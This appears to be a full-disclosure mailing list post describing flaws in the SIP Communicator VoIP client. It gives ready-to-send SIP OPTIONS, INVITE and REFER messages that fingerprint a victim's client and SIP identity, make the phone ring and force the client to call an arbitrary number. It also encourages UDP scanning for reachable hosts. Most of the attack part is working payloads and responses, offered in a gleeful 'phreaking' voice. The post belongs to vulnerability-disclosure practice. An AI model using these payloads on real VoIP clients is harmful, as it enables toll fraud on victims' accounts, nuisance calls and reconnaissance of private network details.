Salve Full-Disclosure!

There is a nice open source software floating around for VoIP 
communication, namely "SIP Communicator". For phreakers phun the 
developers have not taken care of much security aspects when 
implementing the SIP protocol.

Now as I got bored scanning around for open 5060 ports I decided to 
share my findings with you. Nice, eh?

SIP defines a whole bunch of messages to communicate with clients. Some 
of the more useful for me are OPTIONS and (of course) INVITE and my 
personal favorite is definitely REFER. Funny things can also happen when 
using the MESSAGE type.

Short intro to SIP first...

SIP is a protocol mostly used over UDP. It has a HTTP like look and is 
used for Session Initialization of VoIP communication. It is used for 
signaling calls and host capabilities (i.e. supported protocols). Many 
other things can be done with SIP though. If you're interested read 
http://www.ietf.org/rfc/rfc3261.txt.

Now, for the quick start, SIP defines the OPTIONS message to ask a 
client for what is supported and what is not. An OPTIONS request might 
look like this (... means truncated for readability):

  OPTIONS sip:1234567890@snafu.com SIP/2.0
  Via: SIP/2.0/UDP 1.2.3.4;branch=371be296e3d ...
  Max-Forwards: 70
  To: <sip:1234567890@snafu.com>
  From: "A Friend" <sip:133713371337@snafu.com>;tag=70e763707a
  Call-ID: 112071fe7c
  CSeq: 63104 OPTIONS
  Contact: <sip:133713371337@snafu.com>
  Accept: application/sdp
  Content-Length: 0

This is pretty much self-explanatory. The from-line tells who is 
requesting the information, the To-line says to whom it is sent.
Now before responding *good* SIP clients check if the 'To'-line matches 
the number that is really registered on the host. Well, *bad* clients 
don't :-)
As you might guess this is where it begins to get phunny... really, this 
is the single stupid point that makes a butterfly change the weather...

If you have a client running SIP Communicator you can easily use the 
above OPTIONS sample and (no matter what 'From' or 'To' lines contain) 
it will honestly answer to your request. It might respond with sth. like 
(... means truncated for readability):

  SIP/2.0 200 OK
  To: <sip:1234567890@snafu.com>;tag=df7a2b75
  Via: SIP/2.0/UDP 1.2.3.4;branch=371be296e3d5d72ee20183d3d146797 ...
  CSeq: 63104 OPTIONS
  Call-ID: 112071fe7c
  From: "A Friend" <sip:133713371337@snafu.com>;tag=70e763707a
  Contact: "4461288" 
<sip:4461288@192.168.1.15:5060;transport=udp;registering_acc=sipgate_de>
  User-Agent: SIP Communicator1.0-alpha6-nightly.build.3041Windows 7
  Allow: INFO,OPTIONS,MESSAGE,BYE,REFER,ACK,CANCEL,NOTIFY,INVITE ...
  Allow-Events: refer
  Content-Length: 0

Not that interesting you might say. But it tells you a lot!
The "User-Agent" tells you that there is "SIP Communicator" running (and 
also the version up to the last bit - crazy!). Take a closer look at the 
"Contact" line. It tells you the LAN IP of the host, but don't care 
about it, its useless for now. It further tells you the registrar and 
the phone number that are registered on the host. In this case it's 
"sip:4461288@sipgate.de". Thats the host's "SIP identity". Keep this in 
mind.
Before we start the real phunny things let's just ring the phone a bit.

All you need to make SIP Communicator ring is an INVITE message. As with 
OPTIONS it will react to the message regardless of the 'To' and 'From' 
headers. So the following message might just do the job (... means 
truncated for readability):

  INVITE sip:1337@snafu.com:5060;transport=udp;registering_acc=sn ...
  Record-Route: <sip:p1.snafu.com;lr>
  Via: SIP/2.0/UDP 127.0.0.1;branch=stupidbranchtag
  From: "A Friend" <sip:133713371337@snafu.com>;tag=f5cb6e692d
  To: <sip:1234567890@snafu.com>
  Contact: <sip:133713371337@snafu.com>
  Call-ID: 2f6633739b@snafu.com
  CSeq: 102 INVITE
  Max-Forwards: 70
  Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
  Supported: replaces
  Content-Type: application/sdp
  Content-Length: 449

  v=0
  o=root 23830 23830 IN IP4 98.15.131.42
  s=session
  c=IN IP4 98.15.131.42
  t=0 0
  m=audio 35430 RTP/AVP 8 0 3 97 18 112 101
  a=rtpmap:8 PCMA/8000
  a=rtpmap:0 PCMU/8000
  a=rtpmap:3 GSM/8000
  a=rtpmap:97 iLBC/8000
  a=fmtp:97 mode=30
  a=rtpmap:18 G729/8000
  a=fmtp:18 annexb=no
  a=rtpmap:112 G726-32/8000
  a=rtpmap:101 telephone-event/8000
  a=fmtp:101 0-16
  a=silenceSupp:off - - - -
  a=ptime:20
  a=sendrecv
  a=direction:active
  a=nortpproxy:yes

And it turns out, SIP Communicator happily starts ringing just as if 
someone was calling.

Ok, that is way phunny but you know SIP is much more powerful. A very 
interesting part of the SIP protocol defines the "REFER" message. That 
is some kind of a relay message that tells a host "Please put me through 
to XYZ". Again, this a very useful feature of SIP but only when the VoIP 
software acts carefully when receiving these messages. As mentioned 
before, "SIP Communicator" doesn't handle that very restrictive. In 
contrast to an INVITE message "SIP Communicator" needs correct values 
for the sip-ID of the host it resides on. So for constructing a valid 
REFER request we need the users sip-ID. Remember the OPTIONS message and 
the "Contact" line in its response? We already got the ID! With these 
infos and some enclosure we can construct a REFER request that lets SIP 
Communicator call an arbitrary telephone number. We use the origins 
sip-ID for REFER and Contact lines and construct a sip-ID from the phone 
number to call and the SIP provider of the client in the "Refer-To" 
line. We might want call the number 1-800-FUCKYOU (that is 18003825968):

  REFER sip:4461288@sipgate.de SIP/2.0
  Via: SIP/2.0/UDP 1.2.3.4;branch=31f175a7e2d ...
  Max-Forwards: 70
  To: <sip:4461288@sipgate.de>
  From: "A Friend" <sip:133713371337@snafu.com>;tag=ae894a32e8
  Call-ID: 5fae3cc039
  CSeq: 93809824 REFER
  Contact: <sip:4461288@sipgate.de>
  Refer-To: sip:18003825968@sipgate.de
  Content-Length: 0

If you then get an answer that says "SIP/2.0 202 Accepted" you got it.

  - PLEASE - be advised, that calling a number from someones SIP phone 
might generate costs on his bill. If the user using SIP Communicator has 
a prepaid account it might not even work if you try to call so. on the 
landline and there is not enough money available to make that call.
Be nice and don't spend other people's money!!

There are not much SIP Communicator installations around that are 
reachable over the inet and so you can hardly find some hosts to attack. 
Instead you may find many other products responding to probes but as far 
as I can tell they are all much better protected.

Anyway, scanning for vulnerable hosts is an easy task because we're 
using UDP. No three-way-handshake and nasty things. Just send and forget.

Maybe it is just the right time to dive deeper into SIP and VoIP things. 
New applications come out each day, the industry around that sector 
grows and grows and SS7 and companions are still underdeveloped.


keep on phrocking,

stormrider